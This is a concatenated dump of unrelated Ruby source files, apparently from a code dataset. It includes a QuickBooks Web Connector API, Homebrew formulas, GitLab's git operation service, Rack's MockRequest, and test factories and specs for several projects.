  # * "" = No more request XML
  api_method :sendRequestXML,
    :expects => [{:ticket => :string}, {:strHCPResponse => :string},
                 {:strCompanyFileName => :string}, {:Country => :string},
                 {:qbXMLMajorVers => :int}, {:qbXMLMinorVers => :int}],
    :returns => [:string]

  # --- [ Facilitates web service to receive response XML from QuickBooks via QBWC ] ---
  # Expects:
  # * string ticket
  # * string response
  # * string hresult
  # * string message
  # Returns int:
  # * Greater than zero = There are more request to send
  # * 100 = Done. no more request to send
  # * Less than zero = Custom Error codes
  api_method :receiveResponseXML,
    :expects => [{:ticket => :string}, {:response => :string},
                 {:hresult => :string}, {:message => :string}],
    :returns => [:int]

  # --- [ Facilitates QBWC to receive last web service error ] ---
  # Expects:
  # * string ticket
  # Returns string:
  # * error message describing last web service error
  api_method :getLastError,
    :expects => [{:ticket => :string}],
    :returns => [:string]

  # --- [ QBWC will call this method at the end of a successful update session ] ---
  # Expects:
  # * string ticket
  # Returns string:
  # * closeConnection result. Ex: "OK"
  api_method :closeConnection,
    :expects => [{:ticket => :string}],
    :returns => [:string]
end
f82b817af08470b60b8899537226f2308de9413d | 197 | require "omniauth-gca/version"
require "omniauth-gca/version"
require "omniauth/strategies/gca"
require "gca_sso_client/engine"
require "gca_sso_client/concerns/controllers/gca_sso_client_authentication"

# Namespace module for the GCA SSO client engine; all behavior lives in the
# required engine/strategy/concern files above.
module GcaSsoClient
end
1dea8a150e81ca037d298bc28aaed25c7e174955 | 591 | class Admin::TaxDocsController < Admin::BaseController
before_action :year_check, except: [:index]
def index
# FIXME
@years = [2013]
end
def show
redirect_to action: :index, anchor: "y#{year}"
end
def form_1065
@form_1065 = TaxDocs::Form1065Presenter.new(year)
end
def schedule_d
@schedule_d = TaxDocs::ScheduleDPresenter.new(year)
end
def schedule_k
@schedule_k = TaxDocs::ScheduleKPresenter.new(year)
end
private
def year_check
if year.blank?
return redirect_to '/admin'
end
end
def year
params[:id]
end
end
| 16.416667 | 55 | 0.675127 |
39f6c015dcc735c3a99b4c7ffc12adae65dd7dec | 1,598 | class Vramsteg < Formula
  desc "Add progress bars to command-line applications"
  homepage "https://gothenburgbitfactory.org/projects/vramsteg.html"
  url "https://gothenburgbitfactory.org/download/vramsteg-1.1.0.tar.gz"
  sha256 "9cc82eb195e4673d9ee6151373746bd22513033e96411ffc1d250920801f7037"
  head "https://github.com/GothenburgBitFactory/vramsteg.git", branch: "1.1.1"

  livecheck do
    url :head
    regex(/^v?(\d+(?:\.\d+)+)$/i)
  end

  bottle do
    cellar :any_skip_relocation
    sha256 "d004f9d2ef1b642f8128c368e57235f6d2580fd90d928da9996684430a6881ee" => :big_sur
    sha256 "a6f6f99e3b12dca8a56919d1144b10e43a9059e7691d56dfdf8aab330e6febe8" => :catalina
    sha256 "a868fba582ce440a14ae18d4be193209e7d25fd3291b568bea7f123e61aa044d" => :mojave
    sha256 "0c9aff3582ad05a388cba8c43770ead295d921a8e419323a3c4115f09e609ba1" => :high_sierra
    sha256 "7f65668b7bb036fb19e69bdc9cbc2ec48728bc8c1936253f6d5e8d74a113a3fd" => :sierra
    sha256 "e4b3e2e66c2f772a38de529b884091a2ffa1f920af6604696129d21cc9e70b99" => :el_capitan
    sha256 "9285766e0502b88c62d3d295402a41c46b8d9d2707a492bb5d70484b1080c212" => :yosemite
    sha256 "f9ea5a2984d676db153d2128b1aa84a413edb93692e9c6be8147e5a856d42972" => :mavericks
    sha256 "993d951d168210668304d0363b9f8eba6e7f5037537fc49bb12dc013c0e518e1" => :x86_64_linux
  end

  depends_on "cmake" => :build

  def install
    system "cmake", ".", *std_cmake_args
    system "make", "install"
  end

  test do
    # Check to see if vramsteg can obtain the current time as epoch
    assert_match /^\d+$/, shell_output("#{bin}/vramsteg --now")
  end
end
| 42.052632 | 94 | 0.783479 |
6a7d1594ad7aec43ac71f83d3e7e4176be2b5acd | 1,189 | # frozen_string_literal: true
module Stupidedi
  module Versions
    module FunctionalGroups
      module FiftyTen
        module SegmentDefs

          s = Schema
          e = ElementDefs
          r = ElementReqs

          # HD: Health Coverage segment (X12 5010).
          # Only the first element (E875) is mandatory; note E609 is used
          # twice (positions 6 and 7), as is E1073 (positions 9 and 11).
          HD = s::SegmentDef.build(:HD, "Health Coverage",
            "To provide information on health coverage",
            e::E875 .simple_use(r::Mandatory, s::RepeatCount.bounded(1)),
            e::E1203.simple_use(r::Optional,  s::RepeatCount.bounded(1)),
            e::E1205.simple_use(r::Optional,  s::RepeatCount.bounded(1)),
            e::E1204.simple_use(r::Optional,  s::RepeatCount.bounded(1)),
            e::E1207.simple_use(r::Optional,  s::RepeatCount.bounded(1)),
            e::E609 .simple_use(r::Optional,  s::RepeatCount.bounded(1)),
            e::E609 .simple_use(r::Optional,  s::RepeatCount.bounded(1)),
            e::E1209.simple_use(r::Optional,  s::RepeatCount.bounded(1)),
            e::E1073.simple_use(r::Optional,  s::RepeatCount.bounded(1)),
            e::E1211.simple_use(r::Optional,  s::RepeatCount.bounded(1)),
            e::E1073.simple_use(r::Optional,  s::RepeatCount.bounded(1)))

        end
      end
    end
  end
end
| 37.15625 | 73 | 0.602187 |
acb78fd4bc110da7abf45abad63ce340616f1a75 | 1,980 | # frozen_string_literal: true
require 'tempfile'
SiteHealth.require_optional_dependency('html-proofer')
module SiteHealth
  # Checks for various HTML misstakes (backed by the excellent HTMLProofer gem)
  class HTMLProofer < Checker
    name 'html_proofer'
    types 'html'

    protected

    # Writes the page body to a temp file, runs HTMLProofer over it and
    # records each reported failure as an issue (plus the full list as data).
    def check
      tempfile(page.body) do |file|
        proofer = ::HTMLProofer.check_file(file.path, config.html_proofer.to_h)
        # NOTE: HTMLProofer raises if errors are found
        begin
          proofer.run
        rescue StandardError
        end

        errors = build_test_failures(proofer.failed_tests)
        errors.each { |error| add_issue(title: error) }
        add_data(errors: errors)
      end
    end

    # @return [Array<String>] list failures
    def build_test_failures(failed_tests)
      failed_tests.each_with_object([]) do |failed_test, memo|
        next if ignore_test_failure?(failed_test)

        # Removes file name from error message
        memo << failed_test.split('.html:').last.strip
      end
    end

    # HTMLProofer expects internal links to be present on disk, Jekyll-style,
    # since we're checking remote pages we ignore those failures
    # @return [TrueClass, FalseClass] returns true if the failed test should be ignored
    def ignore_test_failure?(failed_test)
      return false unless config.html_proofer.ignore_missing_internal_links

      ['internally linking to', 'internal image', 'internal script'].any? do |needle|
        failed_test.include?(needle)
      end
    end

    # Creates a tempfile around the passed block
    # @return [Object] whatever the passed block returns
    # @yieldparam [Tempfile] the temporary file
    def tempfile(string)
      file = Tempfile.new([name, '.html'])
      begin
        file.write(string)
      ensure
        file.close
      end

      result = yield(file)
      file.unlink
      result
    end
  end

  SiteHealth.register_checker(HTMLProofer)
end
| 29.117647 | 87 | 0.687374 |
7990a3339e8f02611dbe7fb48a6c8e375efd2535 | 1,574 | # frozen_string_literal: false
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
require 'google/container/property/regionalcluster_addons_config_horizontal_pod_autoscaling'
require 'google/container/property/regionalcluster_addons_config_http_load_balancing'
module GoogleInSpec
  module Container
    module Property
      # Wraps the `addonsConfig` fragment of a regional GKE cluster API
      # response. NOTE: this file is auto-generated by Magic Modules (see
      # header) — regenerate rather than hand-editing.
      class RegionalClusterAddonsConfig
        attr_reader :http_load_balancing

        attr_reader :horizontal_pod_autoscaling

        # @param args [Hash, nil] raw API fragment with 'httpLoadBalancing'
        #   and 'horizontalPodAutoscaling' keys; nil leaves all readers nil.
        # @param parent_identifier [String, nil] used only for #to_s context.
        def initialize(args = nil, parent_identifier = nil)
          return if args.nil?
          @parent_identifier = parent_identifier
          @http_load_balancing = GoogleInSpec::Container::Property::RegionalClusterAddonsConfigHttpLoadBalancing.new(args['httpLoadBalancing'], to_s)
          @horizontal_pod_autoscaling = GoogleInSpec::Container::Property::RegionalClusterAddonsConfigHorizontalPodAutoscaling.new(args['horizontalPodAutoscaling'], to_s)
        end

        def to_s
          "#{@parent_identifier} RegionalClusterAddonsConfig"
        end
      end
    end
  end
end
| 39.35 | 170 | 0.625794 |
ed6ea638235cb4c84f40e66383afc935d34a12ff | 4,500 | class GitOperationService
attr_reader :user, :repository
def initialize(new_user, new_repository)
@user = new_user
@repository = new_repository
end
def add_branch(branch_name, newrev)
ref = Gitlab::Git::BRANCH_REF_PREFIX + branch_name
oldrev = Gitlab::Git::BLANK_SHA
update_ref_in_hooks(ref, newrev, oldrev)
end
def rm_branch(branch)
ref = Gitlab::Git::BRANCH_REF_PREFIX + branch.name
oldrev = branch.target
newrev = Gitlab::Git::BLANK_SHA
update_ref_in_hooks(ref, newrev, oldrev)
end
def add_tag(tag_name, newrev, options = {})
ref = Gitlab::Git::TAG_REF_PREFIX + tag_name
oldrev = Gitlab::Git::BLANK_SHA
with_hooks(ref, newrev, oldrev) do |service|
# We want to pass the OID of the tag object to the hooks. For an
# annotated tag we don't know that OID until after the tag object
# (raw_tag) is created in the repository. That is why we have to
# update the value after creating the tag object. Only the
# "post-receive" hook will receive the correct value in this case.
raw_tag = repository.rugged.tags.create(tag_name, newrev, options)
service.newrev = raw_tag.target_id
end
end
def rm_tag(tag)
ref = Gitlab::Git::TAG_REF_PREFIX + tag.name
oldrev = tag.target
newrev = Gitlab::Git::BLANK_SHA
update_ref_in_hooks(ref, newrev, oldrev) do
repository.rugged.tags.delete(tag_name)
end
end
# Whenever `start_branch_name` is passed, if `branch_name` doesn't exist,
# it would be created from `start_branch_name`.
# If `start_project` is passed, and the branch doesn't exist,
# it would try to find the commits from it instead of current repository.
def with_branch(
branch_name,
start_branch_name: nil,
start_project: repository.project,
&block)
start_repository = start_project.repository
start_branch_name = nil if start_repository.empty_repo?
if start_branch_name && !start_repository.branch_exists?(start_branch_name)
raise ArgumentError, "Cannot find branch #{start_branch_name} in #{start_repository.path_with_namespace}"
end
update_branch_with_hooks(branch_name) do
repository.with_repo_branch_commit(
start_repository,
start_branch_name || branch_name,
&block)
end
end
private
def update_branch_with_hooks(branch_name)
update_autocrlf_option
was_empty = repository.empty?
# Make commit
newrev = yield
unless newrev
raise Repository::CommitError.new('Failed to create commit')
end
branch = repository.find_branch(branch_name)
oldrev = find_oldrev_from_branch(newrev, branch)
ref = Gitlab::Git::BRANCH_REF_PREFIX + branch_name
update_ref_in_hooks(ref, newrev, oldrev)
# If repo was empty expire cache
repository.after_create if was_empty
repository.after_create_branch if
was_empty || Gitlab::Git.blank_ref?(oldrev)
newrev
end
def find_oldrev_from_branch(newrev, branch)
return Gitlab::Git::BLANK_SHA unless branch
oldrev = branch.target
if oldrev == repository.rugged.merge_base(newrev, branch.target)
oldrev
else
raise Repository::CommitError.new('Branch diverged')
end
end
def update_ref_in_hooks(ref, newrev, oldrev)
with_hooks(ref, newrev, oldrev) do
update_ref(ref, newrev, oldrev)
end
end
def with_hooks(ref, newrev, oldrev)
GitHooksService.new.execute(
user,
repository.path_to_repo,
oldrev,
newrev,
ref) do |service|
yield(service)
end
end
def update_ref(ref, newrev, oldrev)
# We use 'git update-ref' because libgit2/rugged currently does not
# offer 'compare and swap' ref updates. Without compare-and-swap we can
# (and have!) accidentally reset the ref to an earlier state, clobbering
# commits. See also https://github.com/libgit2/libgit2/issues/1534.
command = %W[#{Gitlab.config.git.bin_path} update-ref --stdin -z]
_, status = Gitlab::Popen.popen(
command,
repository.path_to_repo) do |stdin|
stdin.write("update #{ref}\x00#{newrev}\x00#{oldrev}\x00")
end
unless status.zero?
raise Repository::CommitError.new(
"Could not update branch #{Gitlab::Git.branch_name(ref)}." \
" Please refresh and try again.")
end
end
def update_autocrlf_option
if repository.raw_repository.autocrlf != :input
repository.raw_repository.autocrlf = :input
end
end
end
| 28.66242 | 111 | 0.7 |
e2fd16fbd38a3de942f6039cbfcf58643577a2cc | 833 | require_relative 'test_helper'
require 'apartment/resolvers/database'
# Verifies that models listed in Apartment's excluded_models stay pinned to
# the default tenant (on a shared connection) while other models switch.
class ExcludedModelsTest < Apartment::Test
  def setup
    setup_connection("mysql")
    Apartment.configure do |config|
      config.tenant_resolver = Apartment::Resolvers::Database
      config.excluded_models = %w(Company User)
    end
    super
  end

  def test_model_exclusions
    Apartment::Tenant.adapter.process_excluded_models
    # Excluded models are rewired to the dedicated :_apartment_excluded spec.
    assert_equal :_apartment_excluded, Company.connection_specification_name

    Apartment::Tenant.switch(@tenant1) do
      assert_tenant_is(@tenant1)
      # Excluded model keeps pointing at the default tenant after a switch.
      assert_tenant_is(Apartment.default_tenant, for_model: Company)
    end
  end

  def test_all_excluded_models_use_same_connection_pool
    Apartment::Tenant.adapter.process_excluded_models
    assert_equal Company.connection_pool, User.connection_pool
  end
end
| 25.242424 | 76 | 0.777911 |
2166841f2ae7297458735af495e60e882d26d06c | 3,624 | # This file defines factory methods that are functionally related
# to the Expertiza quiz feature. Factories can be used to create
# objects unique to quizzes, including:
# QuizQuestionnaire
# QuizQuestion
# QuizQuestionChoice
# QuizResponseMap
# QuizResponse
# Answer
#
# Note that many of these classes are subclasses specializing
# in quizzing and that the superclasses have a winder purpose.
# Additionally, objects that are not unique to quizzing but
# which show up in the relationships can be found in
# factories.rb.
FactoryBot.define do
  # Quiz Questionnaire is the main representation of a quiz
  # in the Expertiza model. It shares a one-to-many relationship
  # with QuizQuestion and QuizResponseMap, and foreign keys
  # to an AssignmentTeam. It is important to note that
  # the instructor_id field, a holdover from the Questionaire
  # superclass, is the field used to store the team id.
  factory :quiz_questionnaire, class: QuizQuestionnaire do
    name 'Quiz Questionnaire'
    # NOTE(review): if no AssignmentTeam exists, `AssignmentTeam.first.id`
    # raises NoMethodError on nil before the `||` fallback can run —
    # confirm fixtures always seed a team first.
    instructor_id { AssignmentTeam.first.id || association(:assignment_team).id }
    private 0
    min_question_score 0
    max_question_score 1
    type 'QuizQuestionnaire'
    display_type 'Quiz'
    instruction_loc nil
  end

  # Quiz Question is the main representation of a single question
  # in a quiz questionnaire. It stores the question text, type,
  # and shares a many-to-one relationship with quiz questionnaire.
  # Each quiz question shares a one-to-many relationship with
  # quiz question choices and answers.
  factory :quiz_question, class: QuizQuestion do
    txt 'Question'
    weight 1
    questionnaire { QuizQuestionnaire.first || association(:quiz_questionnaire) }
    # NOTE(review): `[QuizQuestionChoice.first]` is an Array literal and
    # therefore always truthy (even `[nil]`), so the `||` fallback here is
    # dead code — verify this matches the intended behavior.
    quiz_question_choices { [QuizQuestionChoice.first] || association(:quiz_question_choices) }
    seq 1.0
    type 'MultipleChoiceRadio'
  end

  # Quiz Question Choice stores the definition for each individual
  # choice within a question. It foreign keys to its associated
  # question.
  factory :quiz_question_choice, class: QuizQuestionChoice do
    question { QuizQuestion.first || association(:quiz_question) }
    txt 'Answer Choice 1'
    iscorrect 0
  end

  # Quiz Response Map is a relationship between a Quiz Questionnaire,
  # an Assignment Team, and a Participant. The reviewer is an
  # individual participant who is taking the quiz, the reviewee is
  # the team that created the quiz questionnaire.
  factory :quiz_response_map, class: QuizResponseMap do
    quiz_questionnaire { QuizQuestionnaire.first || association(:quiz_questionnaire) }
    reviewer { Participant.first || association(:participant) }
    # NOTE(review): `Teams` (plural) — confirm this constant exists; the
    # association name below is the singular :team.
    reviewee_id { Teams.first.id || association(:team).id }
  end

  # Quiz Response represents a single response to a quiz
  # questionnaire. It foreign keys to a quiz response map.
  factory :quiz_response, class: QuizResponse do
    response_map { QuizResponseMap.first || association(:response_map) }
    is_submitted 1
  end

  # Answer records a participants answer to a single quiz
  # question. It shares a many-to-one relationship with
  # quiz question and quiz response.
  factory :answer, class: Answer do
    question { Question.first || association(:question) }
    response { Response.first || association(:response) }
    answer 1
    comments 'Answer text'
  end

  # ScoreView contains data from Questions, Questionnaire
  # and Answer tables and has all the information necessary
  # to calculate weighted grades
  factory :score_view, class: ScoreView do
    q1_id 1
    s_question_id 1
    question_weight 1
    s_score 1
    s_response_id 1
    s_comments "test comment"
  end
end
| 37.75 | 95 | 0.750828 |
33c87a3525701c8d80b77cc3352603085292f425 | 1,995 | # typed: ignore
require 'ddtrace/contrib/support/spec_helper'
require_relative 'support/helper'
# Verifies that the Datadog Sidekiq ClientTracer creates a span when a job
# is pushed, both standalone and nested under an existing trace.
RSpec.describe 'ClientTracerTest' do
  include_context 'Sidekiq testing'

  subject(:perform_async) { job_class.perform_async }

  let(:job_class) { EmptyWorker }

  before do
    # Install ONLY the client tracer middleware so spans come from it alone.
    Sidekiq.configure_client do |config|
      config.client_middleware.clear
      config.client_middleware do |chain|
        chain.add(Datadog::Contrib::Sidekiq::ClientTracer)
      end
    end

    Sidekiq::Testing.server_middleware.clear
    Sidekiq::Extensions.enable_delay! if Sidekiq::VERSION > '5.0.0'
  end

  it 'traces job push' do
    perform_async

    expect(span.service).to eq('sidekiq-client')
    expect(span.resource).to eq('EmptyWorker')
    expect(span.get_tag('sidekiq.job.queue')).to eq('default')
    expect(span.status).to eq(0)
    expect(span.parent).to be_nil
    expect(span.get_metric('_dd.measured')).to be_nil
  end

  context 'with nested trace' do
    it 'traces job push' do
      tracer.trace('parent.span', service: 'parent-service') do
        perform_async
      end

      expect(spans).to have(2).items

      parent_span, child_span = spans

      expect(parent_span.name).to eq('parent.span')
      expect(parent_span.status).to eq(0)
      expect(parent_span.parent).to be_nil

      # The push span must be parented under the active trace.
      expect(child_span.service).to eq('sidekiq-client')
      expect(child_span.resource).to eq('EmptyWorker')
      expect(child_span.get_tag('sidekiq.job.queue')).to eq('default')
      expect(child_span.status).to eq(0)
      expect(child_span.parent).to eq(parent_span)
      expect(child_span.get_metric('_dd.measured')).to be_nil
    end
  end

  context 'with delayed extensions' do
    subject(:do_work) { DelayableClass.delay.do_work }

    before do
      stub_const('DelayableClass', Class.new do
        def self.do_work; end
      end)
    end

    it 'traces with correct resource' do
      do_work
      # Delayed jobs should be labelled "Class.method", not the generic
      # extension wrapper class.
      expect(spans.first.resource).to eq('DelayableClass.do_work')
    end
  end
end
| 27.328767 | 70 | 0.690226 |
627ee4a66e2ddbbfc2c95831cb6a747e3cacdd78 | 974 | class Chicken < Formula
desc "Compiler for the Scheme programming language"
homepage "http://www.call-cc.org/"
url "http://code.call-cc.org/releases/4.10.0/chicken-4.10.0.tar.gz"
sha256 "0e07f5abcd11961986950dbeaa5a40db415f8a1b65daff9c300e9b05b334899b"
head "http://code.call-cc.org/git/chicken-core.git"
bottle do
sha256 "829af14ce63b487de7300073f256efbea7ecbd876ee577bff1dbc3080ec60c3b" => :yosemite
sha256 "7b2c75d1cd7d3f74881885d6bf7522597beefe35a1ce99715ea1dff35d579e4b" => :mavericks
sha256 "1f46226c58b1b7cd92f4d0c68cc0583e2c5ec4c2cce60b53193afca9a5d8be19" => :mountain_lion
end
def install
ENV.deparallelize
args = %W[
PLATFORM=macosx
PREFIX=#{prefix}
C_COMPILER=#{ENV.cc}
LIBRARIAN=ar
POSTINSTALL_PROGRAM=install_name_tool
]
system "make", *args
system "make", "install", *args
end
test do
assert_equal "25", shell_output("#{bin}/csi -e '(print (* 5 5))'").strip
end
end
| 28.647059 | 95 | 0.725873 |
1df961b31dd0e603bf94cf3012e1dfd037411061 | 59 | module Kickscraper
class Update < Api
end
end | 11.8 | 22 | 0.627119 |
26f484a8940375525125dac7739fdc0df4c7d9e6 | 5,090 | require 'uri'
require 'stringio'
require 'rack'
require 'rack/lint'
require 'rack/utils'
require 'rack/response'
module Rack
# Rack::MockRequest helps testing your Rack application without
# actually using HTTP.
#
# After performing a request on a URL with get/post/put/delete, it
# returns a MockResponse with useful helper methods for effective
# testing.
#
# You can pass a hash with additional configuration to the
# get/post/put/delete.
# <tt>:input</tt>:: A String or IO-like to be used as rack.input.
# <tt>:fatal</tt>:: Raise a FatalWarning if the app writes to rack.errors.
# <tt>:lint</tt>:: If true, wrap the application in a Rack::Lint.
class MockRequest
class FatalWarning < RuntimeError
end
class FatalWarner
def puts(warning)
raise FatalWarning, warning
end
def write(warning)
raise FatalWarning, warning
end
def flush
end
def string
""
end
end
DEFAULT_ENV = {
"rack.version" => Rack::VERSION,
"rack.input" => StringIO.new,
"rack.errors" => StringIO.new,
"rack.multithread" => true,
"rack.multiprocess" => true,
"rack.run_once" => false,
}
def initialize(app)
@app = app
end
def get(uri, opts={}) request("GET", uri, opts) end
def post(uri, opts={}) request("POST", uri, opts) end
def put(uri, opts={}) request("PUT", uri, opts) end
def delete(uri, opts={}) request("DELETE", uri, opts) end
def request(method="GET", uri="", opts={})
env = self.class.env_for(uri, opts.merge(:method => method))
if opts[:lint]
app = Rack::Lint.new(@app)
else
app = @app
end
errors = env["rack.errors"]
MockResponse.new(*(app.call(env) + [errors]))
end
# Return the Rack environment used for a request to +uri+.
def self.env_for(uri="", opts={})
uri = URI(uri)
uri.path = "/#{uri.path}" unless uri.path[0] == ?/
env = DEFAULT_ENV.dup
env["REQUEST_METHOD"] = opts[:method] ? opts[:method].to_s.upcase : "GET"
env["SERVER_NAME"] = uri.host || "example.org"
env["SERVER_PORT"] = uri.port ? uri.port.to_s : "80"
env["QUERY_STRING"] = uri.query.to_s
env["PATH_INFO"] = (!uri.path || uri.path.empty?) ? "/" : uri.path
env["rack.url_scheme"] = uri.scheme || "http"
env["HTTPS"] = env["rack.url_scheme"] == "https" ? "on" : "off"
env["SCRIPT_NAME"] = opts[:script_name] || ""
if opts[:fatal]
env["rack.errors"] = FatalWarner.new
else
env["rack.errors"] = StringIO.new
end
if params = opts[:params]
if env["REQUEST_METHOD"] == "GET"
params = Utils.parse_nested_query(params) if params.is_a?(String)
params.update(Utils.parse_nested_query(env["QUERY_STRING"]))
env["QUERY_STRING"] = Utils.build_nested_query(params)
elsif !opts.has_key?(:input)
opts["CONTENT_TYPE"] = "application/x-www-form-urlencoded"
if params.is_a?(Hash)
if data = Utils::Multipart.build_multipart(params)
opts[:input] = data
opts["CONTENT_LENGTH"] ||= data.length.to_s
opts["CONTENT_TYPE"] = "multipart/form-data; boundary=#{Utils::Multipart::MULTIPART_BOUNDARY}"
else
opts[:input] = Utils.build_nested_query(params)
end
else
opts[:input] = params
end
end
end
empty_str = ""
empty_str.force_encoding("ASCII-8BIT") if empty_str.respond_to? :force_encoding
opts[:input] ||= empty_str
if String === opts[:input]
rack_input = StringIO.new(opts[:input])
else
rack_input = opts[:input]
end
rack_input.set_encoding(Encoding::BINARY) if rack_input.respond_to?(:set_encoding)
env['rack.input'] = rack_input
env["CONTENT_LENGTH"] ||= env["rack.input"].length.to_s
opts.each { |field, value|
env[field] = value if String === field
}
env
end
end
# Rack::MockResponse provides useful helpers for testing your apps.
# Usually, you don't create the MockResponse on your own, but use
# MockRequest.
class MockResponse
def initialize(status, headers, body, errors=StringIO.new(""))
@status = status.to_i
@original_headers = headers
@headers = Rack::Utils::HeaderHash.new
headers.each { |field, values|
@headers[field] = values
@headers[field] = "" if (values.nil? || values.empty?)
}
@body = ""
body.each { |part| @body << part }
@errors = errors.string if errors.respond_to?(:string)
end
# Status
attr_reader :status
# Headers
attr_reader :headers, :original_headers
def [](field)
headers[field]
end
# Body
attr_reader :body
def =~(other)
@body =~ other
end
def match(other)
@body.match other
end
# Errors
attr_accessor :errors
include Response::Helpers
end
end
| 26.649215 | 108 | 0.594303 |
5df88d5626f7a673eed64aeaa304c415d214d85b | 939 | class CreateUserAuthentications < ActiveRecord::Migration
def change
create_table :user_authentications do |t|
t.integer :user_id
t.string :uuid
t.string :uid
t.string :provider
t.string :name
t.string :email
t.string :username
t.string :token
t.string :secret
t.string :refresh_token
t.datetime :token_expires_at
t.string :avatar_file_name
t.string :avatar_content_type
t.integer :avatar_file_size, default: 0
t.datetime :avatar_updated_at
t.string :profile_url
t.string :profile_image_url
t.date :birthday
t.string :locale
t.string :gender
t.integer :status, default: 0
t.timestamps
end
add_index :user_authentications, [:uuid], unique: true
add_index :user_authentications, [:uid,:provider]
end
end
| 27.617647 | 58 | 0.603834 |
b94343ed2596027ea51bda126175f81e7ca535df | 91 | module Japanese
module Train
module Access
VERSION = "1.1.0"
end
end
end
| 11.375 | 23 | 0.615385 |
01d0fd227c7c2252fc5f767c8245a7b82bde5df0 | 212 | module Mole
module Version
MAJOR = 1
MINOR = 0
TINY = 15
# Returns the version string for the library.
#
def self.version
[ MAJOR, MINOR, TINY].join( "." )
end
end
end
| 13.25 | 49 | 0.556604 |
39194baab3e30d29a3fe3e8fdd9387a565f7ce98 | 637 | Pod::Spec.new do |s|
s.name = 'MSCircularSlider'
s.version = '1.2.2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.authors = { 'ThunderStruct' => '[email protected]' }
s.summary = 'A full-featured circular slider for iOS applications'
s.homepage = 'https://github.com/ThunderStruct/MSCircularSlider'
# Source Info
s.platform = :ios, '9.3'
s.source = { :git => 'https://github.com/ThunderStruct/MSCircularSlider.git', :branch => "master", :tag => "1.2.2" }
s.source_files = 'MSCircularSlider/*.{swift}'
s.requires_arc = true
end
| 39.8125 | 127 | 0.587127 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.